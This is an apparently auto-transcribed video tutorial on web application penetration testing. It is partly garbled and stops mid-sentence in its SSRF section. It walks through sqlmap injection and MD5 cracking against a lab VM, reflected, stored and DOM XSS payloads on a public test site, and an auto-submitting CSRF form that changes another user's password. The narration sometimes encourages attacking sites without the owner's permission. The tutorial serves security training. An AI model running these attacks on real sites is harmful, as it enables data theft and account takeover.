Hello guys, welcome back to a Pentesters Club. Today we're going to learn about a web application penetration testing. So, what is a web application penetration testing? So, web application penetration testing, it involves performing a simulated attack on web apps to determine a weakness that hackers can exploit. The testing process uses eliminations of the real world attacks to identify of the hidden attacks such as like SQL injection, cross-site scripting, cross-site request forgery, and everything. So, so it will help to identify for infrastructure like a firewalls or DNS servers in public facing any changes made to the infrastructures can make a system vulnerable. A web application pen testing helps to identify real-world attacks that could succeed in accessing these systems. It identifies all vulnerabilities. So now, what are the things we can need to test here in the web application penetration testing? So we are going to identify in this web application penetration testing. Like first one is advanced SQL injection. So it's here. So first one is advanced SQL injection. So in the advanced SQL injections, so we would like to test for a different SQL injection types in uh, blind time SQL and out of a band and everything. So even of a high level targeted securities website also, we can use SQL injections to make it as vulnerable. Okay. Then we also look at automated tools like SQL map alongside a manual techniques, union based, error based, boolean based, everything. And test different database managements like MySQL, PostgreSQL, and MassSQL also. Then next is uh, cross-site scripting. So cross-site scriptings, when you look here, like a reflected access, it tests a payload injection in reflected data URLs from the input. And sorted access. In the sorted access, targeted data storage mechanisms, a databases, a local storages. Then DOM-based access. Uh, the DOM-based access, it inspect the JavaScript and execute the dynamic or DOM manipulation of vulnerable input points. Then, once you come back to a cross-site request forgery. So, in the cross-site request forgery, uh, we would like to test like a get and post method by attempting a force unauthorized actions of user behalf of without knowledge. Like you can intercept the message targeted website as a get or post through a Burp Suite. Then you can go for directly with SQL injection. You need to find the weak point before that. Then once we go for uh, server side request forgery. So server-side request forgery, it exploits a server-side functionalities to make a request to an intended internal system. Check for misconfiguration that allows access to full metadata service or internal networks. Then we would like to look for a security misconfigurations. So security misconfigurations, we would like to look here, look for default settings like one of the targeted website have some default settings and open admin interfaces, workforce error, message and forgotten development environments. So each and every website developer he need to upgrade each and every time. Then and only the website must should be uh, not to get any vulnerabilities. Then, directory browsing and brute forcing. Directory browsing and brute forcing uses tools like Directory Buster or GoBuster to brute force hidden directories on files. Manually browse for a sensitive directories or example like admin, backup, or etc. things. Then, we would also get a CMS vulnerability scanning. So, CMS vulnerability scanning, it will run automated scans for CMS specific vulnerability scanners like WP scan, for a WordPress and check off outdated plugins, themes, and core installations. And network scanning. When it comes to a network scanning, we use a top tool named called Nmap to scan a web server ports and enumerate a network services that might lead to a further attacks. Then auth bypass, authentication bypass. So test the login and session mechanism for a weak points like SQLI or cookies modification to bypass the authentication. Then web app enumeration uses enumeration tool to map out a web functionalities, hidden paths, subdomains, parameters, and user roles, and everything. Now, directory attacks. In the in the dictionary attacks, so uses a password cracking tools like Hydra, Burp Suite, Intender to perform a dictionary attacks to log in the file. Insecure direct object like IDO. So test for exposed user or a object reference that can be manipulated access data without a proper authorization. Now we go for broken access control. So in broken access control, we manually inspect the access of the control of business logic vulnerabilities, ensure a privilege escalation is not possible by altering a user roles or accessing the roles. Then local file inclusion. In the local file inclusion, uh, we test if the web app allows to a local files by exploiting a file path manipulation. Then, remote file inclusion. Check if the web app can be tricked into an executing a code from a remote server. Then, arbitrary file upload. In the arbitrary file upload, like you can create any type of image. In the image, you need to make it as backend for the payload. You need to run in that image as a payload in the backend. Then you need to upload into the website. So you can once any person will click on that image, so you can get the access of that device. So this is an arbitrary file. So it will explore a file upload or download functionalities to see if the application allows for uploading or downloading our arbitrary files, and test a file type of restrictions and MME types of checks also. Then we go for using components with the known vulnerabilities. Like we would like to utilize like a most popular website is exploit database. With the exploit database, we would like to check the most common unknown vulnerabilities using tools like OWASP dependencies checks to identify libraries and components with the known of vulnerabilities. And also we can use uh, NVD, otherwise CVE and OS dependencies check also we can do that one. Then command injections. So in the command injection, we can manipulate input fields to inject the executed system commands on the underlying OS. Then we go for a remote code execution. Tests or input that can lead to an arbitrary code execution on the server. Once we go for a file tampering, investigate if it's possible to tamper a file upload to gain unauthorized access like a PHP reversal or XYZ things. This is file tampering. Then, privilege escalation tests for misconfiguration that allows user to escalate a privilege and modify roles or gaining admin access of that any one of the organizations. So we can test in a virtual environment that we are going to get a privilege escalation. Then, log file sweep. Inject a code or payload into a log files that could be executed when logs are viewed by an administrator. Then, weak SSL ciphers. So, we use a tools like SSL labs to scan for a weak SSL or TLS configuration and test a protocol vulnerabilities example like Poodle, Beast, Heartbleed, everything. Then, cookie modification, like modifying a cookie to attempt a session hijacking and authentication bypass and privilege escalation. Then, source code analysis. we would like to review the source code for hard-coded credentials, insecure dependencies, logical flaws, and coding a best practices. Then we also look for HTTP header modification. It manipulates a HTTP header like a refer user agent or X forwarded for a bypass control uh, to trigger the vulnerabilities. Then session fixation. So session fixation test is a session that can hijack setting a fixation of the session ID before a login. And clickjacking. Clickjacking is a POC of CVE IDs. We can get it from the exploit database. So clickjacking will be possible of any targeted website where you can get entirely of that in one of the that website in one click. So this test for application is vulnerable for clickjacking by attempting to embed it in an iframe on a malicious page. That's it. So the most popular tools we are going to use, one is for a I would like to utilize the main machine is Kali Linux for attacker machine, and rest is we would like to look any real time world examples. Then I try to use the Burp Suite, OWASP ZAP, SQL Map, Nikto, Hydra, WP Scan, and much other tools. So in next tutorial, we would like to test from here advanced SQL injection. That's it.
So guys, now in web application penetration testing, so our first task is advanced SQL injection. So any type of hard type of high level security of targeted website, it may can't able to do the penetration testing or SQL injection on that. So we can do that type of website here. So our first task is to identify our network. So I have identified my target hosting machine here for advanced SQL injection. So our task is now we need to make an SQL injection that's make it vulnerable. So first we would like to enter our targeted IP address 192.168.18.145. So where we have gotten this one, so we would like to look as a pen test the company website of the server to get the root. So we would like to look the pesos. There is an href. We would like to visit this. Okay, so I don't need to go to a targeted thing. So here, from here, we try to utilize the targeted for SQL injection. So for this as an SQL injection, so I have selected this targeted website to make an SQL injection that's vulnerable. So we need to find the right parameter here. So once you visit to the any type of targeted website, we first of all need to look where is the loophole and where is the parameter that will be injectable that one. So for that we try to do here as first we try to go with the directory buster. So we would like to identify any useful information we can get here. So let me I just make new tab, just make it as directory buster, paste it. Then I try to utilize also a Nikto scanner, so that we would like to discuss a later further. So just type as Nikto minus H, then it's paste it. Then let we would like to look here. So from here we do not yet get any one useful information here. So how we try to go further? So we try with Nikto. Nikto, I have identified there is an robust.txt file. So we try to copy this one. We try to go here. From here as robust.txt. So from the robots.txt, so you can look here, disallow, where you get as an parameter id. You can see a uh, / question mark equal to admin. So there you have got this and all. We try to inject from here. Now let's see here. So we try to open new tab and we try to test this. So just type here as javac question mark q equal to as admin. It was access is denied. Now you are not authorized to access this page. Okay. So there we have find somewhat as a loophole. Now I try to utilize. It is in Drupal Digon. I think we try to go with the Drupal Digon. That's not going to be worked out. We try with the. I try to utilize this as a q equal to a node. Then we try this node /2. So here maybe a workout. So we try to copy this one. So just write here, you just write here as SQL map minus u. Then paste this one minus 2 minus minus dbs minus minus batch. Now let's see here. We try to do the SQL map in this. So now you are seeing minus the q might not be an injectable. So you don't need to get a disappointed because we are going to achieve this one without fail. So once you get as a critical here of any one of the targeted website, what else you have chosen? So you try to look here. So if q is not vulnerable, then at least we find right parameter I here as q. Now we try to look here as first as a view page source. Now it is and 2. Now you can look here elite, it was content. Okay, so now I try to look as a node as 3. So once you look here in the here you not get any useful things. Now we try to look until like to get some useful information. So you need to study here another just another BioWare store. Now you can look here. It's a preview of current productions line. Feel free to order of our finest AI modules. Okay. So we try with the 4. You can look here in the 4. It's our latest BioWare model. It has been enhanced, genetically engineered cyber brain, excellent for huge problem solving, counterintelligence, and network institution. Now, we try to with this as 5. So we need to identify one by one. Here, Kushangi is a perfect agent. It has also a voice of woman. Her body is full of cybernetic. So was written some messages. Now, right with the 7, we would like to look with the 6. We try to identify here. Togasus is capable for disguising himself completely by the use of thermo-optical camouflage information ware. So this was done. Now I try with the 7. Now let me would like to look here. Now where I have got it here, for a detailed view of documentation of our products, please visit our documentation platform at the job abc doc. So just copy this one, come back here, enter your targeted IP address, then forward slash. So where we have identified here and we have seen here all those things here. Now we also look here where in the downside open docspan version 1.2.7. So you just entirely copy this one. So just copy, come back here. Now we try to identify, you just type here and I just type here as exploit, then let's pursue this. So you just need to remove the V, that's it. Open document. So where I have got as an open document, so you just copy this one, you just type here as exploit minus F. So where we identify this one, how to exploit this targeted machine. And I just type cat 32075.txt. That's it. Now, what's our first is SQL injection on open document. It's an CVE. So for SQL injection host, then you need to go with this targeted thing until a 9. So just copy this one. So from where you need to paste it here, from here. So you just paste it this. So where you have got it now here is, you can look here 5.5.47 O Ubuntu. So it was posted in the Ubuntu. So we have identified this one. So once you have identified, you can see a web main guest, and this is in Ubuntu. So where we have identified this and all. That's great. Okay. Now let me, I just copy this one. I want to visit here also. Jabak box. So this is not important now. So where we have identified here. So now before here not get anything else. So we have a guest webmin and Ubuntu. So we try here as you can see here. Or then let me, I try with some other thing like let me where we have find the first one SQL injection. So the vulnerability exists due to an insufficient validation added value for HTTP get parameter as to get Ajax udf.php. The script, a remote authentication attacker, can execute a arbitrary SQL commands. So where we have arbitrary SQL commands is version from here 1 2 3 4 5 6 7 8 9. That's great. Now we try with another one. Now let me, I would like to do here directly without going further. So I want to try for SQL injection. So our target is SQL injection. So this is maybe a vulnerable for SQL injection. So just copy this one. So I don't want to select union select one of the version like this. So I don't want to select. Now let's come back here. So we just type clear. So which we was failed. SQL map minus u, then pasted this, then minus dbs. So this I need to paste it in here. That's better. Minus dbs minus batch. Now let's see here how we are going to get it. So now also might not be injectable. If maybe we can get it, we try to do a more. So you can see here, uh, we need to try to do it again. So this is may not be an injectable here. So this is might be somewhat a error. So if somewhat is error, so let me try to utilize this one with, I would like to download here a proxy for Burp Suite. Then let me open this as Burp Suite. So let me, I just open this Burp Suite. So let me, I try with the Burp Suite, then to request as a get method. Once this is done, then we try to go further. This is okay. Now we would like to add here as a proxy. Now let me just pin to a toolbar, come back here. So if you know how a proxy, so you just click on add, click on options. Now click on proxies. So you can add a proxy here as a verb. So I just enter as a Burp Suite 8080, then click on save. Let me just, I try to look, click on save. So where we have save here, it's in Burp Suite. That's great. Now let me, I would like to look this. So where it's now it's starting. Let it start now. This Burp Suite. So sometimes you need to get a get request to a Burp Suite to make an SQL injection. So why we need to get as an get request? Here I would like to show you here. The for SQL injections or open document. So the vulnerable. So here you need to look here. This is my SQL server. HTTP get parameter. We need to get this parameter from the proxy. So we try to go inject directly, so it not work out. So before going to this, so let me just open new tab here. We just enter as 127.0.0.1 to 8080, where you get a Burp Suite certificate. So you just click on this, where you get downloaded this one. Now click on here, as go to as settings, Now we just type here as certificate. Now click on view certificates. Now import the CA certificate here. So this one is big. So make it this big. So here we got CA certificate. So just click on open. Now a pop-up will come. So you just click on trust this CA certificate and everything. So you just click on OK. Then here is also OK. This was done. Close here. This one. Now before switching on the proxy, so you just enter here Jacob docs. Now here we try to as log in here as with the guest and guest. It may be our code or not. We can try one time. So you just type here as guest. Try to enter. So where we have login here. So we can see this all guests and guests. So you just need to close this also. This also. So where we have identify all those things here. Now our target is, so you can switch the Burp Suite. So Burp Suite is up. Now we would like to come back to our Burp Suite. Click on the proxy tab. Now you just make it as interception is up. That's it. Now what is our target thing is, so we just need to get delete until here union. Then you need to send this a get request in the Burp Suite. Where I have got this a get request. You can see a get request of this targeted thing. So entirely you just copy this one. So just copy this one, come back here, open a notepad. So just type clear, just type again as a nano as a request. Then let it paste this as a request what you have done from the Burp Suite. Paste this. Now you just type here as SQL map -r for a request. You need to present the request ---dbs ---batch. That's it. Now we are going to get it here successfully without fail. Now let's see here. Now again we are getting here the parameter might not be injectable. So you don't need to worry. So we are going to doing as an advanced SQL injection. So how harden of the targeted website they have put for firewalls or etc. things. We are going to bypass all those things and get the SQL injection. You can see here injection. So again we have failed here. So if you have failed here, so we have got a hint here. You need to specify the level and risk. Okay. Now we need to specify as level equal to 3. Risk. Oh, sorry. I need to specify minus a risk. I would like to go for a risk. So that will compress the website, give an hardened things of this targeted parameter. Then we are going to get it. Now let's see here. Again, it will come as might not be an injectable. So no need to worry about that. Not maybe injectable. So it may take a little bit lengthy time. Then we're gonna get it all. So we can see this one when it will come. So now if it's not coming as a critical, okay, now we are going to getting the database of your targeted website. So you need to make it try very harder and give the lot of pressure of the targeted website to extract the information. Now we can see here we are extracting. So where you can identify the right parameter, where is vulnerable, how we are going to get it. Now you can look here everything. So once you are not getting any type of error, so you are in a good place to go for with this. Let's see now. So you can see here it is recommended to perform a basic union test if there is at least one other potential techniques found. So even it will check the union test. Then we would like to look it out here. Get parameter does not seems to be injectable, and heuristic based test shows the get parameter add value might not be injectable. So once you get all those things here without as an a red error, you may get 100% sure of the SQL injection, what you have targeted, how you can do the hardening of the targeted website. You can get a successful here. Now you can see here get parameter add value appears having clue it may be injectable. Now you are done to get the data. Now we would like to look here. Now you can look here from the non-injectable to injectable where you have got the injectable and where you have got the entire of the database here. Now you need to extract all those things. So where they have a Drupal information, then information schema, Jacob, MySQL, performance schema, and PHP MyAdmin. So we have identified one of the targeted website which they have posted over there. So our main target is Jack docs. So just copy this one. So utilize the same one. So in the minus minus TBS place, I just need to enter as a database of the this one Jacob. So I just enter as a tables, then minus minus batch level 3 and risk 3. That's it. Now let me would like to try here. where I have got here now everything. Now, what is our task is from the tables I have extracted here. So, I need to identify only the users, ODM users. So, just copy this one. Now, I would like to come back here from go to assessment tables from ODM users. Then we would like to type as a dump R. That's it. Once you dump R, so you can identify how many users are registered in the targeted website and what is their passwords, everything. So that you can identify here. So you can get it here. So let's wait a little bit time. So where you can get everything. So it may take a little bit time to crack this. We need to wait with the patience. Here. So SQL injection is very quite easy way, but you need to try with very patience. Then and only you can get a succeed. If you get any type of errors and if you can quit, then you are not going to be get any further more. That's it. So you need to try again until you get. Then and only you can achieve of this SQL injection. So a lot of people they fail in the SQL injection, so they can't able to inject any type of targeted websites because the lack of analysis, a lack of identifying the parameters and the right port where they are storing. That's it. Like a right parameter of the directories. Now, let's we would like to look this. So it may also take a little bit 10 minutes time to cracking all those things here. Let me would like to look this also. So this will come with numeric and alphanumeric and with special characters for a cracking the passwords. So we are almost done to crack this. I think now it's going with the first as capital one, then again with the small. I think yes. So once this is done, then we would like to go further. So it may take a lot lengthy time process to crack only the what else is available inside. So maybe next 4 to 5 minutes it will be over. Then we would like to look at further. So once we would like to look it out here, this union query, where we got it is the query. So the payload which we was put here automatically. Now we would like to look this. So it make taking a lot lengthy time process to complete a simple task here. So now where we have identified here as a guest. Now you can see here it take a long lengthy time process to identify all here. So we are here at the end of the movement. Let's see here. So we are at the end of the movement. We would like to get it now. Everything. So the lastly one of the character is jet. So we are going to get it now. This one. So if it get a critical, no need to worry. So now you can look here, everything of the data. Now it was done. Now you can look here. So where you have got here as information system by where everything. So that is stored in this location. Home Pentest Club, dot local, share SQL map, output, your targeted IP address, dump, Jacobs, OEM department dot CSV. So your recorded file, what else you have done that one. This is also stored here. Now we need to identify the usernames and passwords. So we can scroll up, none, view, forbidden, read, write, admin. That's great. Scroll up, here also up, come back here. So where you have identified unable to connect the target URL of SQL map is going to be as a request. Here we already identified webmail, the username at Ubuntu and as guest, the password where this is in MD5. So I would like to show you how to crack this password. So we just type here, now just type here as hash identifier. Now you just paste the hash. So now you can look here is have with MD5. So we need to crack this MD5 hash password. So where we have got all these things as a request. Let me close this. This is not useful now. We just completed our task from here. Now switch off this Burp Suite. Yes. So we need to go for MD5 decryptor. So we would like to look this MD5 decrypted your hashes. So now just enter here the password. You try to decrypt here. So while it may not coming, I try to utilize another one. So I would like to utilize this one. Now let me just paste this. So it may also not coming. We try again with another one. It may not come. So better we would like to use this as decode of France. So some websites may can give the result, some websites they not give a result. So we need to identify, otherwise we need to make as some tool in the Windows. So we need to paste here MD5 hash. Then decrypted this one, where you can get the result here. You can look here. So you have got the password is webmain 1980. That's it. So where we have successfully completed this SQL injection. That's it. You have identified all here. Look here all. So this is guess where it will almost all crack. If not crack, you need to utilize MD5. That's it. So you try it your own, guys. Now next we would like to discuss another topic.
So guys, now we are for the second task is for first we would like to discuss about a reflected, then sorted and DOM based. So first our task is a reflected. So reflected cross-site scripting. So this occurs when an attacker injects a malicious script into a website and the injected script is reflected back to the user's browser immediately via often URL parameter or from inputs. The key is to type an attack that's in the server does not permanently store uh, the malicious input, but instead it reflects in the response. It's just like similar like a flash need to be stay sometime. Okay, how reflected accessors will work. So it will be work like through an injections, like the attacker craft the URL containing a malicious JavaScript, a parameters using as a such bar. So there they're gonna inject a parameter ID, like a script with the script tag or etc. things. And user integration. The attacker convinces a victim to click a malicious URL through a phishing link, otherwise a social engineering. And reflection. The vulnerable website reflects the input a malicious script back into a HTTP response. Typically, in such a result, error message or the box. Now, how you going to be executed? The victim browser intercept the reflected script and legitimate content execution. The script leading to a malicious actions such as a session hijacking, cookie theft, or redirection to a malicious site. That's it. Now, we are going to do the practical in this, only a reflected exercise, then later we would like to continue. So first, you try to open the browser. Now, you just type here as test php.vulnerweb.com. So I want to do only a test website. I don't want to go as their YouTube terms and conditions. So I have made in this one very big. Now, I have here as such a art. So I would like to input anything else. So I just input as h1 pcpl alex subscribe. Then we try to put it for as h1. Try to go for a send. So where I have got the response pcpl alex as subscribe. Here you can look here. Now also you would like to look the as base source where we would like to search a PHP method, post search art type, browse categories. We not yet get here. So let me try to find here as a PCPL. Here you have find here. Yes, where the page search for PCPL Alex is subscribe H1, H2, where it was presented. That's why page name. Okay. Now I want to add here. So let me, I just open this, inspect the elements. Then I try a little bit upside. This is better. Then I go for a network. Then click on start. Yes. So this is not this way. We try to utilize as well. No, this is not okay. So let me come back here. Yes, where I have got it here, test.php, search query equal to query, where we have got it this. Now, I try to put as a some script. So just type here as a script. Then in the script, I just put as alert alert. Then we just write here as access. Then close the script tag. That's it. Now try to send this where you have got this a Fabical loader where you have got this all. You can see your access. So this is only a reflected. So where you have query, you can enter this query, you can get it here. So if you want to make a little bit sometimes for uh, constant type, you just entirely put again with the test enter of the URL with the script tag. That's it. So where here we got the access. So you can change anything also. Now we just leave it this. We would like to look it here as HTML. You can look here as outside. So user agent power HTML. It was a transfer encoded is chunked. That's it. Now here what we have request here. This is the request. Press get and go response. So where we have got the responses. Akunetics website security. That's it. Now I try here one more time. So now let me try here as a script tag. Then we just type as alert. Then we just type here again as PCPL alerts. Then we just close this. Then type here as a script tag. Then try to click on go. Here I have got it here PCPL Alex, so don't close this one. Now we try to look this HTML, CSS. No, this HTML where we have requested here PCPL Alex the script. Now response you can see we not get here as proper response because it was embedded directly. So once you put as raw, the raw where we get here. So here where PCPL Alex where the script tag is encoded here. So we have got it here. Look here. So almost all done. This one. So this is how you can do the reflected access. That's it. So guys, now we have already done the reflected. Now we are going to do the stored access. So what is a stored cross-site scripting? It's also known as persistent access. Occurs when an attacker injects a malicious script that are permanently stored on a target server, such as in a database or on a forum post or injected script served to users who access the affected page, leading to a automated execution of the attack code without any need of interaction with the attacker. So, how stored access will work? So, the attacker injects a malicious script, JavaScript, into a vulnerable input field, such as in the comment box, otherwise message boards, or user profiles. So, the web application saves the malicious script in database or other persistent storage. Now, whenever another user visits, like you visit to the targeted like community forums or XYZ things. You can choose anyone like a Facebook, X, otherwise some other things. So there will be a comment page. If they can execute a uh, sorted access that will store in the server. Okay. And whenever another users they log in and check in the same of the targeted place, okay, that will be visible over there. So if you can click or command, it will divert to another places. So that will not come to in right proper way. So the script can perform various malicious actions such as like a stealing session, cookies, locking keystrokes, or redirecting users to phishing sites. So where you can enter your credit card or banking details or XYZ things, so that they will do that. So now we would like to do this stored access. So we would like to come back to our attacker machine. Make it this big. Now let me open our targeted website. Now let we just visit here as test.php.conweb. So let me I try to delete this. So where we have visited here. Now let me make it for this as little bit big for it. Oh, now it's very good. Now let me I try to log in here first. Once you have login here, username is test. Then password is also a test. That's it. You have login here. Once you log in here, Samarat select contact. So where it's available here. So I would like to utilize as a guest book. Now I want to write here as some as the script tag. So just write here as the script. Then you just write alert. Then you would like to write any message. So you just write again as PCP Alex subscribe. Then you just close the script tag. Then close the script tag. Then you try to add message. You can look here. We have got here PCPL Alexa subscribe. That's great. Now you're not at getting anything else here. What else you are right here? So this is it will be stored here. Let me. We would like to look first. Open this inspect elements in the network. Nothing have. Let me. I try here again as a script alert. Then just type here as PCPL Alex subscribe. Then let's close this. Then let me would like to close the script tag. Once this is done here, where it is there here, you would like to look here version ID. It's the same. Request, it's okay. Then this is the request, the script tag. Now adding a message, then response. Here we not yet get here. We would like to look here in the response. Yes. So here nothing else yet. Let it come back here. So if this is not come, so just close this. So I would like to write to add here as a h1. You try here as Alex subscribe. Then we just close this h1 tag. Then you try to add a message. You can see here PCPL Alex subscribe where we have got the data. So if people they visit here, that they can look here automatically. Now I want to add some tag here, like let me we would like to let me I try to look this as a pesos. Where is this? So we not at power to look manually. So you just start right here as a PCPL. So here, where we need to go here. So you can see where it was added here as PCPL Alex and subscribe. That's it. Now let I try to add as a, you can also inspect here. Come back. So, so inspect here. Here you can see where it was written here PCPL Alex. That's it. Now we try to add as a image source. Now we try to add as image source. Then image source equal to I don't want to provide any type of URLs. I would like to present as X. That's okay. Then I want to present as on error. Now on error equal to, you just need to type as uh, uh, error. Just type as an alert. That's it. Then we would like to close the image tag. That's it. We try to add here. Here you can look here a test.php on a web which was came here. So just come to a network. So once you have click here, now you can see a image tag is added here. So one of the customers, they would like to come and look in this targeted page, they can look this one, the targeted image. So here you can add some of malicious script, add everything. So now you can see where source equal to an X or error equal to alert, where we have added here. So if you present on source in X place, any one of the targeted URL. So any one of the target person, if you click on that image, that will redirect into a phishing page. That's it here. So even you can modify any one of the targeted website of your choices, your wish. You can choose any one of the targeted website. You can utilize over there. So without a site administrator or a developer, otherwise site owner, without his or her permission, you can change here yourself. So this does not require any type of privilege. So this is how you can store in the server of stored access. So you can store any type of malicious things here. So if you found any type of stored access, which will leads to get as entire of the organizations as backdoor. So that's more helpful. That will pay you a more bounty. That's it. So this is how you can perform a stored access. Now we would like to go for next as a DOM-based access. So guys, now we have completed, reflected and sorted. Now we are going to do the DOM-based cross-site scripting. So for the DOM-based cross-site scripting, so what is a DOM-based cross-site scripting? When it will occur? So it will occur when a malicious script are executed as a result of a client-side, a JavaScript manipulation of a DOM, document object model. You can also call as a DOM. Unlike a reflect sorted access, the vulnerability is present in the client-side code rather than a server-side. The server never sees or modifies a malicious script. So what else we are doing this DOM-based script? This will not never modify or never see in the server side. So making it harder to detect. So This script is very hard to detect in any type of website. Now, how DOM-based access will work? So it's like a client-side vulnerabilities. Like you are visited to the Facebook, and you can execute some commands as script tag or XYZ tags. So you can see only by client side, but you cannot see by the server side, or you cannot modify anything. So the web application uses a JavaScript to dynamically modify the DOM, such as updating the web page based on the URL parameter from input other user control data. Now, we try also input manipulation. The attacker provides a malicious input like URLs or use a control elements that improperly handled by the JavaScript code, leading to a direct manipulation of DOM without proper sanitization. How the script will execute in the client side a browser. So the browser execute manipulated JavaScript code, which may result in the execution of malicious script, allowing for various such attacks as stealing cookies, session tokens, or performing an unauthorized tokens. Now, we try to do the practical now. So come back here, browser. Now, we try to go to test the main thing only, the testing website, web.com. So you have seen here as a such, you can directly add a script tag here. So we have already seen this one in the reflected and storing access. So we just add here. We just type here as alert script. Then we try to here. You can see a PCPL alert subscribe. Where once you click here, okay, that's great. Now, so common source for DOM-based access like URL parameters, fragmentation, identifier, user input fields, JavaScript that reads a DOM elements like inner HTML, Docker, document write, or equation. So now we try here is so where I have got here as a query. In the query also, I would like to execute here as image tag for here. So just type here as image, then source, uh, source equal to X, then on error equal to alert. Then you can close this. I would like to specify on alert one. Try here, it not work out. So where page equal to test image. I try to enter as source. Just need to enter here X. It's also not work out. So if in this case it's not work out, we try here as some other thing. Now I try to look any one of the categories. Here I have look like here as posters in the cat place. So I just enter as this image tag source equal to. I try to enter source as, let me present as X. Then just type as alert one Close this. Now you can see here where I have got the image file along with the warning. There was error with the MySQL parameter. Now we would like to look the pesos. Okay, so what else I have selected that one. Okay. Now we would like to look this elements. So now we have got here as an elements. Now we try here, go to a network, nothing else. So let me try here one more time where I have got it this. You can look here. No, we not get this cookies. So there is no cookie as still as requested. So where you have got it here, but image is not getting here. So but we have got it here. So once we would like to come back here. So where we can see this one. Like we would like to look this. So once this is came, I just enter a one. Now it's almost all. It's automatically detecting this DOM-based access. So and connection is refused. So what else inside of the targeted website? It's have also. I try to look there. It's not gonna be allowed to use over there. That's it. So this is how you can do a DOM-based access attack. So this is only work for client side. It will not go into the server side. Now we would like to look here, come back here, here. Now I try to enter here as here. I try to here enter as one. See here. So again, if this is error escape, then it will only work only with the client side, not by the server side. Because of here as people connect. What's this? Okay. Now you can see here it will executing only by client side. It will not execute by the server side. So the website developer, otherwise site owner, does not know about this client side error. So he cannot able to uh, manipulate this one. So we have successfully executed this DOM-based access attack. Now, next, what we would like to look here. So we have successfully completed these three things: reflected, sorted, and DOM-based cross-site scripting. Now, we would like to do the cross-site request forgery and get and post method also we can see. Then uh, later we would like to continue.
So guys, now we are going to discussing about cross-site request forgery. So what is this CSRF attack? So CSRF attack is known as cross-site request forgery. Is a type of web security vulnerability that tricks a user into performing an unwanted actions on web application where they are authenticated. The attack leverages the trust a website has in the user browser. So, how this CSRF works? User authentication. The user logs into a trusted web application and gets an authenticated session, often via session cookies. Malicious request. The attacker creates a malicious website or sends a malicious link that, when visited, causes the browser to send a request to the trusted web app. Unintended actions. So the web application, without verifying the legitimate message of the request, executes the action under the user's credentials, like transferring the funds, changing the account informations, or XYZ things related to the targeted of where you have done. Now, we would like to target here. Number one is I have set up here for CSRF. So this is my target IP address. So I have visited to the this web application of the CSRF attack. So first we would like to identify the loophole. So first we would like to come back here. So first we would like to try with the directory buster. We would like to look identify anything else is here is available. Then we try to go with as nicto minus h, and then let it paste here. Here, nothing else. We are not getting any useful information. So I try to go with the directly as a directory buster, a go buster. So let me clear. So once you visited all these things, so you just need to mustn't should be login first. We don't know the login. So I just clear. I just go with the go buster directory minus here. Then paste this. One list is user share one list directory buster directory list 2.3 medium.txt. So where we would like to extract from here. So before that, I try to look here or explore. We would like to go to an about page and etc. things. We would like to look here. So we look the page source first. Nothing else. Then we try to look as a login. We don't know the username and password to log in here directly. So this is what somewhat tricky here. We try to do here. So if you don't have account, so let me, I don't have account, so click on this, I don't have account. Then we try to go for as a login. So you just write as, I just write as simple like this, just write here, a login. So where I have created an account, so just type here as what else you have created an account. Then you can explore all those things. What else you have features here. So once you visited without this one, that will redirect to an login. So where you have seen here to messages, so that it is redirect to login. Now let it come back here. Now we would like to click here change password. Nothing, so you just click on users. So where we got the Spider-Man, pirate, test, and Alex. So now we would like to click on the messages. There is nothing else a message to communicate here. Now, what is our task? So first we would like to know, is this injectable for a CSRF attack or not? So let me see here. There I got it here as bootstrap. So just copy this one. We would like to look this here as a bootstrap. Paste it here. Hey there. It's our primary drop menu, alerts, program bars, rest of groups, events. That's it. So this is not an interesting thing. So we just look back here. So when we will get it here is about. So let's let's wait here, then we would like to go further. So I think we are going to get it right now. This one. Let's see what. So here I have identified one is an hint. So just copy this one, come back here, then let it place this as hint. Now let you just cut this. So just try here. This also be here. So now what we would like to do here is, are you sure that there is something to see? We would like to look the pesos. In the pesos, you can identify here, you can look here. First, the admin visit the website rarely or frequently. Then you have identified here. Second, he runs a locally with the 127.0.0.1 CSRF attack. So we have identified here where a CSRF attack is possible. Now let we try to go to here as a messages. Now let we have identified this one, so I would like to reopen this. So reopen where we need to identify this one to write as CSRF mode. Now let me try here. So just type here as exit. So just type here as notepad. HTML. Now we just write here as HTML tag. Then we just write here as h1. So let me close this as HTML. Then we just write here as h1. This here, Alex. Subscribe. Then let it save this, then close. Now open the folder. Now let me open this with the Firefox, where we have seen here PCPLRX subscribe. That's great. Now I would like to write as here as a 3 or 4 targeted people is here messages. So we would like to utilize here not users, where I would like to utilize as Spider-Man. Now again we would like to utilize this one, come back here, so just close this. Now I just type here as head, then go for as title, close the title there itself, where we have closed the title, then close the head. That's great. Now let me just open as body. Now we just to write as a form, name equal to, I would like to write as something as the that form. Then let me just specify as method equal to as post. You will need to put as an action equal to enter this one in the localhost 127.0.0.12.8081 / change password. That's it. Now we need to write as a input type equal to, we just need to type here this one like hidden name equal to username value equal to, we need to give as a Spider-Man, then let we would like to use this, then let I just put here the same thing, so just copy this one, paste it. Value is, so I just put as a password, that's great. So once we have done here the password, so in the username place I just need to specify as a password. I just put here 0, that's great. Now let me close the form tag. Now later we open the script, so we just open the script tag. I would like to type here as somewhat to get without an error type equal to text, otherwise a JavaScript. Text or a JavaScript, then that's great. Then later we need to specify here as document dot platform dot submit. So where I have used as platform. Okay. Now we just close the script tag. So where is the script tag? Now close the body tag. So I just type here as body tag, close it. Now just save this. So where we have done here successfully, now just type here as python -m http dot is server. Now I would like to get it from my locally, so we would like to go here messages. Now click on get messages. In the Spider-Man, you just need to write here something as, hey, can you check this out? You just type here at http target address 192.168.18.19.8000 alex.html. So try to send it. Now let me would like to here, but I noted get here as after a long time. Now I have got the HTTP request from 142 where they have got the Alex. So now I have successfully changed the Spider-Man password. Now what I would like to do here is go for logout. Once we have logout, we just go for as login. You just type here as a Spider-Man password, that's it, login. So when you have logged successfully, now we would like to click here change password for Spider-Man. Now you can see here Spider-Man. Now go to messages. Now you can look here, hey, can you check out this my targeted thing where I have got this. The actual real password of this one is crazy password of the Spider-Man. where I have changed the password to. Let me show you here. So with this, just type cat alex.html. So I have changed this password. This is how a CSRF attack will work. That's it. Now, next we would like to discuss about SSRF attack. Hello guys, now we are going to discussing about SSRF attack. So what is SSRF attack? Server-side request forgery is a vulnerability where an attacker tricks a server into making a request unintended location, including an internal system that the attacker would not normally have access to it, like a backend of the system. So this happens when web applications allows a user submit a URL or other input the server process by making a HTTP request on behalf of the user. So how SSRF will work? So SSRF work like in the user input. The web application allows a user to specify the URL like a downloading file, accessing files, APIs, or XYZ things. Manipulated a request. The attacker manipulates this input and make a server and send the request to an internal system. Uh, Now, internal resource access. The server unaware of the attack send the request 